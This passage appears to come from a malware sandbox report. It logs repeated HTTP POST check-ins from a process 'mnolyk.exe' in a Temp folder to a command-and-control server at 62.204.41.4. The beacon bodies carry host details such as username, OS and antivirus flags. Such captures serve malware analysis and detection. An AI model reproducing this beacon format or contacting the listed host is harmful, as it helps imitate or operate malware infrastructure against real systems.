                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.630285025 CET | 538 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        338 | 192.168.2.5 | 50028 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:19.806368113 CET | 539 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.871136904 CET | 539 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        339 | 192.168.2.5 | 50029 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:20.040672064 CET | 540 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.106918097 CET | 540 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        34 | 192.168.2.5 | 49724 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:39.798183918 CET | 234 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.865067005 CET | 235 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        340 | 192.168.2.5 | 50030 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:20.273308039 CET | 541 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.339488983 CET | 541 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        341 | 192.168.2.5 | 50031 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:20.511059046 CET | 542 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.576251030 CET | 542 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        342 | 192.168.2.5 | 50032 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:20.769004107 CET | 543 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.834661007 CET | 543 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        343 | 192.168.2.5 | 50033 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:21.009109974 CET | 544 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.079492092 CET | 544 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        344 | 192.168.2.5 | 50034 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:21.257214069 CET | 545 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.322240114 CET | 545 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        345 | 192.168.2.5 | 50035 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:21.518035889 CET | 546 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.582262039 CET | 546 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        346 | 192.168.2.5 | 50036 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:21.758203030 CET | 547 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.822861910 CET | 547 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        347 | 192.168.2.5 | 50037 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:21.991528988 CET | 548 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.057874918 CET | 548 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        348 | 192.168.2.5 | 50038 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:22.237631083 CET | 549 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.301232100 CET | 549 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        349 | 192.168.2.5 | 50039 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:22.475115061 CET | 550 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.538532972 CET | 550 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        35 | 192.168.2.5 | 49725 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:43.045429945 CET | 235 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.130012035 CET | 236 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        350 | 192.168.2.5 | 50040 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:22.709350109 CET | 551 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.774275064 CET | 551 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        351 | 192.168.2.5 | 50041 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:22.955497026 CET | 552 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.020642996 CET | 552 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        352 | 192.168.2.5 | 50042 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:23.193844080 CET | 553 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.260596991 CET | 553 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        353 | 192.168.2.5 | 50043 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:23.431242943 CET | 554 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.497637987 CET | 554 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        354 | 192.168.2.5 | 50044 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:23.661386967 CET | 555 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
